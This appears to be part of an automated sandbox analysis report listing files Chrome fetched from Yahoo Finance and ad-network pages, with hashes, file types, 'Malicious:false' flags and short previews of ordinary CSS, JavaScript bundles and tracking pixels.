                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@keyframes slideUp{0%{transform:translateY(200%)}to{transform:translateY(0)}}@keyframes adhide{0%{visibility:visible}to{visibility:hidden}}@keyframes show-success-message{0%{opacity:0;transform:translateY(10px)}80%{opacity:1;transform:translateY(0)}to{opacity:0;transform:translateY(-10px)}}@keyframes immersive-share-appear-in{0%{opacity:0}to{opacity:1}}@keyframes fade{0%{opacity:1}to{opacity:0}}@keyframes shine{0%,to{opacity:1}50%{opacity:.5}}@keyframes wave{0%,60%,to{transform:initial}30%{transform:translateY(-4px)}}@keyframes inlineXrayTooltipFadeIn{0%{opacity:0}to{opacity:1}}@keyframes liveBadgePulse{0%{transform:scale(.43,.43);opacity:1}to{transform:scale(1,1);opacity:0}}@keyframes ellipsesAnimation{0%,30.43%{content:"."}34.78%,65.21%{content:".."}69.56%,to{content:"..."}}@keyframes loader-animate{0%{transform:translate3d(-100%,0,0)}to{transform:translate3d(100%,0,0)}}@font-face{font-family:"YahooSerifDisplay";src:local("Yahoo Serif Display"),url(https://s.yimg.com/cv/apiv2/default
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):278
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.895866222456638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:mpXMVXBqaEXXadJNjXWE3PPpXBck7XlaXjRkwXBAl:mpXWXBqanZjXWYpXBF0XmwXBE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BE3851A5336B7857A44D6D00C0658E4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FEC78BC34E87D97790E64F93958779E272FA344B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5CA8AC3AF08C6CB908DD530A6903FEC4219971D29ED8D2C9688D3FC90F5F09A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:60650CA6B2A8D7B71A72D9471EE948C01D17D298AF55AB7D30C3D01858C6835F4C2D13FA1E44AA12EFD5A05735333F92858AE94F5C4D8AA0F0291B7FA6F6B049
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/159.DCpiEfEp.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.hdr.yf-1rv4om1,.top.yf-1rv4om1{--gap:var(--space-4);display:flex;flex-direction:column;gap:var(--gap)}section.top.yf-1rv4om1{border-bottom-color:var(--text1)}.hdr.yf-1rv4om1{--gap:var(--space-2)}@media only screen and (min-width: 1280px){.top.yf-1rv4om1{--gap:var(--space-6)}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 41 x 330, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2986
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.595859761626018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:ki3VLqI5DRFJEmlXv+2KpDRFZdtseQURsd1dA1h6wBxANNh4E6LEZU3KgCDj2fbT:7LFDXlXWzzsZj/dEBxab46SKgC+jCMNn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C2396079060A7028FA898A73B72AA592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:81EE85D797FF9C40A19B15E4130D7F677011C5A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1A166EBD6C8872D71EFCEFB4765DB513014B732E1886525C5F2D5DED87071451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AC8F6403C6F5CD0ACEB315C0EE48DA6A3540D4C012A15A754EFEFE069CB33B6AA3124C3C5C7746185CE4A3EED7898A1AE07C170501AC78CAC16290084255CCA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...)...J............jPLTE...IIY..........#)E..\el.")...\dk!w..j.....j..j.'/;.:.....;.....i.....i....#+1$,4.j..............i.$+3....;..:.#*2.i..;.#+2.;.....j.....j..j..m..i........l..:....#+2#+1\dj.#).j..k..k.#(/.l.&-5.;..n..n....**7....j..:.....j.....;.....k..l.#*2.i..:.#*1.:..i..i........i........;........;.$+1....=...."%,#,5.j..i........j.....j.....j.....j...........n....#+1[dj.").:.$+1....:.$*2.:..j.......#+2.......j..;.$*2.j.....k..;....$+3.l...._fk`gn...ddm$$..A....[mm.l..i.....j....\cj................j..k..l..k..l..j.$*2.j..:.....j.#+2.;.#+1...$+1.;..k..j..:.#+4.;.$+2.i..<.%.3.=..@........j.....l.....i..C..w..i.....:.#*1[cj."(....Z.N....tRNS....*.........x.........@/....j./...eW'...V#"......}}lbR/+'#...........w8&...........ji^QPJ($$............N;/..................{xtqpoaZN?0%!............|dZZI<2!.........~{tng`^KGB972...ePG33....k....(IDATh...W.0....).Q..O.pC.......((....,...{...{o.V..Lz'......D}~..%m?$M..{m....u...=W.d.u8.....3**(....bT@.b..x...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.80666143611544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JSA/FAJu6L2vWclOLNZFrZYTMQ4LNZFrSlKwM313kqugRF/FA4/FIev:vU2vWvLNZFrgMfLNZFr7wg1Ru+64Njv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B1FFAED8B9668B395F784DD975A882AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:85F4BA4EB4ED11CC6BE25F67175519E9D2B8DA3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF3179BEB53AAF37783F1D610493AFDC2285B0E159F25477E9C0A78B38FE9364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3AF3264DBF5061D81C5A40DB797B517639A7B104F936B59D0CFB8084705319E7A9DB84238061F1F72AE691D521D8E977784C3238FCA7183B3F59598293661E61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{H as e,R as o}from"./control.CYgJF_JY.js";function i(r,t){throw new e(r,t)}function c(r,t){throw new o(r,t.toString())}new TextEncoder;export{i as e,c as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):104981
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4105908770883016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:eLHFT1+OmbjFVS2wB5yRCZjZlY38sUPEfTHy8Gnfe+C:gT8OBtykZjZlclUPEfTJOe+C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F2DBD2BAC859028B338D5EE588D1D4A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9F7C91B0060D7A59217FA7644836D78FB28E00CF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F280A2E38F285CAA8E8E3144DAF9E7D8FCC39E5347B6C0B948F8E18773D07571
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A80E7075A689E01DF83431592BEAA27775DFAD0FE468219BE6A905A67F14DAFCB204161AF2B320926388E35E8A99772B5ADDBCD9C42515B8788F15F73F2424E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/shell-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[204],{73326:(n,e,t)=>{var o=t(46783),r=t(27672);void 0===r.window&&(r.window={}),void 0===r.window.__SPOTIM__&&(r.window.__SPOTIM__={}),void 0===r.window.__SPOTIM__.lib&&(r.window.__SPOTIM__.lib={}),void 0===r.window.__SPOTIM__.lib["@spotim/launcher-shared/components"]&&(r.window.__SPOTIM__.lib["@spotim/launcher-shared/components"]=o),n.exports=o},25372:(n,e,t)=>{var o=t(27877),r=t(27672);void 0===r.window&&(r.window={}),void 0===r.window.__SPOTIM__&&(r.window.__SPOTIM__={}),void 0===r.window.__SPOTIM__.lib&&(r.window.__SPOTIM__.lib={}),void 0===r.window.__SPOTIM__.lib["@spotim/launcher-shared/hooks"]&&(r.window.__SPOTIM__.lib["@spotim/launcher-shared/hooks"]=o),n.exports=o},17819:(n,e,t)=>{var o=t(43016),r=t(27672);void 0===r.window&&(r.window={}),void 0===r.window.__SPOTIM__&&(r.window.__SPOTIM__={}),void 0===r.window.__SPOTIM__.lib&&(r.window.__SPOTIM__.lib={}),void 0===r.window.__SPOTIM__.lib["@spotim/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30142), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.262622575589199
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:oB+Pgmf4f4fkSpKYTwHhrZNqFQEVwWI6vLEts6XfEQxZyafRVfaPp:TPD4Af9tTwHDNqLLGsQrt4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D133CBEA9C1D56D1CBE4CB6E77F0EBF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9474B4E8F5149B1124468C4590E850F7BBF141F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5E1E920D663D0BC1E363EC56C7FCCDEDD061F95FA60158C3AF425DAA952027CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:29A9268266585F047F69B565CDF5B1199A6D729A452513A0D534C0FA0B5886D46B7F9EDCB5948340DF45B1C4E9C942E61C53FEF102A7DBEBFF1C2191263C791B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-video-3.2.2-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-video"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(i[a])return i[a].exports;var n=i[a]={i:a,l:!1,exports:{}};return e[a].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,a){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7725)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7726
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.484619408299878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:a1/l91p7+ZwHb6+fhHpfSUBiySB3kR9tO6S95fqfJE6rw1HMTw84duG6+peAb:Al91p7+ZwHb5JK10RG6S6rgMTw8FGeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F610DA6CE0310F00191863F841B4B6FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6A792BFD2049A14F959DAA38F1522874920991F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8A2C3AAB670C528E8740DFE35BDDB19D591402C472DB1FF042D408CF123F7C2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B7215FA44C8946023BD1C519309911EC71B2B750D13D2852031D8EE1FE7D5C10133CAF226F1826D81DDD3BB9F2F876152B4B89A6E7832EFE4F3BB4C798B9C7A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Ne,A as Q,Q as x,a1 as Me,e as L,b as $,d as j,f as V,j as ee,i as E,q as h,O as F,k as T,l as G,G as ve,S as ke,_ as U,P as Oe,I as Ie,W as ze,c as te,u as le,g as ne,a as se,a7 as X,t as Ee,h as Be}from"./scheduler.Dsuh-FKt.js";import{S as Ae,i as De,h as Se,c as ae,b as oe,m as ie,t as _,g as ce,a as M,e as ue,d as fe}from"./index.CvwOawEI.js";import{g as Fe,a as Pe}from"./spread.CgU5AtxT.js";import{c as qe,o as Le,f as je,s as Ve}from"./floating-ui.dom.C5fi-pG6.js";import{B as me}from"./Button.C2rixdaC.js";import{t as Z}from"./commonUtil.BWwawKjd.js";import{C as Ge}from"./close.C3ug6nNR.js";const Qe=e=>({isDisplayed:e[0]&524288}),y=e=>({isDisplayed:e[19]});function Te(e){let t;const l=e[28].default,n=te(l,e,e[31],null);return{c(){n&&n.c()},l(o){n&&n.l(o)},m(o,i){n&&n.m(o,i),t=!0},p(o,i){n&&n.p&&(!t||i[1]&1)&&le(n,l,o,o[31],t?se(l,o[31],i,null):ne(o[31]),null)},i(o){t||(_(n,o),t=!0)},o(o){M(n,o),t=!1},d(o){n&&n.d(o)}}}function p(e){let t,l,n=e[3]&&w(e);const o=e[28].cont
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8527)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.415964657645723
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:8xfdkRBGobhCyN3O1+8u+JWWA+U+N+x+0Y+T86Bph+H+n+b+YqcFq08uiPayViQl:ymBGCCyNy+8u+kWA+U+N+x+0Y+1+H+nb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6E470F4519A4BAD8860D9A796CCF4B2F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8E0CAD096062F90CCF6EE393EF522BAF65405A7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BA4488D54C32A8761EC76005427F8CDE1D8BCB56C19C4C66CFE9A98B8C6BD2FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E1383F5223926EB4F3AC96F6EEDCCCF735B02B4CF82004D6DAEB64126E7A671740EED685069F886CE2642DB9FC71E02D55DF91CC8E71FA053C9B9038070D0579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-e6a21627.433a9f093dc6d5f71b82.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[9365],{3504:(e,t,a)=>{a.r(t);var i=a(4603),r=(a(1772),void 0!==i.mE?i.mE:_exports.CIQ);r.Marker?r.Tooltip=r.Tooltip||function(e){if(!r.Marker)return void console.warn("CIQ.Tooltip addon requires CIQ.Marker module to be enabled.");this.cssRequired=!0;const{stx:t,ohl:a,change:i,volume:l,series:o,studies:s,signalStudies:n,interpolation:p,showOverBarOnly:h,showBarHighlight:c=!0,useDataZone:d,caption:u}=e,{container:m}=t.chart;let y=m.querySelector(".hu-tooltip");if(y||(y=document.createElement("table"),y.classList.add("hu-tooltip"),m.appendChild(y)),u){let e=y.querySelector("caption");e||(e=document.createElement("caption"),y.insertBefore(e,y.firstChild)),e.innerHTML=t.translateIf(u)}let f=m.querySelector(".hu-tooltip-highlight");function g(){const{headsUp:e,crosshair:a}=t.layout,i=e&&e.floating||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4228)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4229
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.259805917055012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:bMgnyi5r63WkHMyApxb2973AAQHkRTPzZXY0xXOPqDYrNzcih:bMgyi56Gaf822URDzZoc0Mezdh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:76E558E47A159109C81CF98B4D71CE92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A02AD5C6383138BCF69EC07000326A23115FA3A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:424F4B32EA612C8A4B49B671A52F2A51B4CE2C0B9D37EB43265671E6F1082BA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:143A17099EE3E706E59FF5D241678A849F9DDC5316DEEC14DCD82A9DECFE95B65F6B66D049B2223DD06664B8D94724BD82E16B2DD111F5557BD1FA0D0EB93DF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as v}from"./commonUtil.BWwawKjd.js";const N=({label:e,request:r=null,response:t=null,context:s,time:a})=>{typeof window<"u"||(s.parent&&typeof s.request>"u"?s.parent().then(({stores:n,session:o})=>{const{isDebug:i=!1}=o;i&&(console.log(JSON.stringify({duration:a[1]-a[0],label:e,request:r,response:t,time:a})),n.debug.addPerf({label:e,request:r,response:t,time:a}))}):(s.locals||(s.locals={}),s.locals.perf||(s.locals.perf=[]),s.locals.perf.push({label:e,request:r,response:t,time:a})))};function q(e,r){console.error("Logger Error:",e,r)}function P(e,r){if(e.name==="AbortError"){const t=new Error("Request timed out",{cause:e});throw q({message:"Request timed out",status:408},r),t}throw q(e,r),e}function T(e,{includeResponse:r=!1}={}){if(!e.ok){const t=new Error(e.statusText);throw t.status=e.status,t}return e.text().then(t=>{let s=t;try{s=JSON.parse(t)}catch{}return r?[s,e]:s})}function U(e){return(r,t)=>{const s=typeof e=="function"?e:fetch,a=(t==null?void 0:t.timeout)||3e3,n=new
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://eus.rubiconproject.com/usync.html?&geo=na&co=us
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=APPNEXUS&partner_device_id=7992184014990425658&pt=27d97432-f92a-465d-8317-0711a36cc1a6%2C%2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1376)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1377
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4519149065185735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:mqhePnseGXU5HcDqd0pSzp5NHFCaxEzvT2ZBJMz0zLoT616C9aNa:mqhunsw5MpQTc/2GzG8TkVV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:80B14245F4DA1C98938F575EF7384080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2E2FD062F05E847B7476B708F04F964100F19F97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F88CCA436E9CD5519975D0B3D039B62D6B3DBEF1AE78D28DE5264ADF8DA7C9CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:116AC0B784FB30812EFC442BB7692D1AD08BAF1593F11E3291EE3AD78064C906032EE023860C65A6B94A2B9BBEFF27046F55C0B44D3C1AE9BC4238379E088FE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadQSPLeafNews.Q8JDUa09.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as L,c as z}from"./commonUtil.BWwawKjd.js";import{n as A,g as Q}from"./utils.CNaWwYSx.js";import{l as T}from"./initializePage.LkEoQoQZ.js";import{l as C}from"./loadQuote.BOFhtUlf.js";import{l as v}from"./logUtil.CCV3qKPL.js";const n={count:250,imageTags:["170x128"],thumbnailSizes:["170x128"],spaceId:void 0,adsSectionId:void 0};async function _(t,{fetchQuoteData:f=!1,listName:i="",isPagination:p=!1,imageSize:u={},...o}={listName:""}){var d;const[r,[b,e,P]]=await Promise.all([L(t),z(["config","ncpStreams","crumb"],t)]),{ads:h={},i13n:k}=b.getPageConfig()??{},{adsSectionId:w}=h||{};n.adsSectionId=w;const{spaceid:c}=k||{};c&&(n.spaceId=c);const{imageTags:m=[]}=o;m.length&&(o.adsImageTags=m);const s=i,y={key:"ncp_fin",...n,adsEnabled:!P.isAdLite,listName:i,perfLabel:`loadQSPLeafNews:${i}`,...o};e.initializeStream(s);try{const a=await T(t,y),{stream:g,pagination:I}=((d=a==null?void 0:a.data)==null?void 0:d.tickerStream)||{},l=A(g,r.lang,{imageSize:u||["170x128"],thumbnailSizes:o.thu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
